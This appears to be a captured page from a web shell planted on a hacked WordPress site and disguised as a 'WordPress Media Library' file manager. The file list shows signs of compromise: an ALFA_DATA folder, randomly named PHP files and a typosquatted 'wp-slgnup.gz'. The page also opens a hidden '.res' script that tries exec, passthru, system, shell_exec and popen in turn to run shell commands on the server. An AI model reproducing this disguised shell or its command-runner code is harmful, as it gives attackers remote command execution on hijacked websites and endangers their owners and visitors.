β WordPress Media Library
File manager
π Media Files
π .ent
π .htaccess
π .k
π .res
π .tmb
π ALFA_DATA
π CYEC07_2winners
π courseHomepage
π§ drum.php
π§ dz2obinl.php
π§ get.php
π google00199521a7227898.html
π google04df80ca1b1ccf54.html
π google0a32d1bf32902599.html
π google80933f13bdd078a6.html
π googleea78e552fedf758c.html
π§ hiroshi.php
π§ index.php
π§ item.php
π license.txt
π§ m00emf1a.php
π§ main.php
π§ nrhshh40.php
π readme.html
π§ retries.php
π robots.txt
π§ srtain.php
π§ wp-activate.php
π wp-admin
π§ wp-blog-header.php
π§ wp-comments-post.php
π§ wp-config.php
π wp-content
π§ wp-cron.php
π wp-includes
π§ wp-links-opml.php
π§ wp-load.php
π§ wp-login.php
π§ wp-mail.php
π§ wp-settings.php
π§ wp-signup.php
π wp-slgnup.gz
π§ wp-trackback.php
π§ xmlrpc.php
β¬οΈ Upload Media
Upload File
π Edit: .res
Size: 753 bytes | Modified: 2026-07-21 10:02:24
<?php $res = run("pgrep mailmanweb"); if (preg_match('/\d+/', $res)) { die('_success_'); } else { die('_failed_'); } function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }
πΎ Save Changes
π₯ Download
ποΈ Delete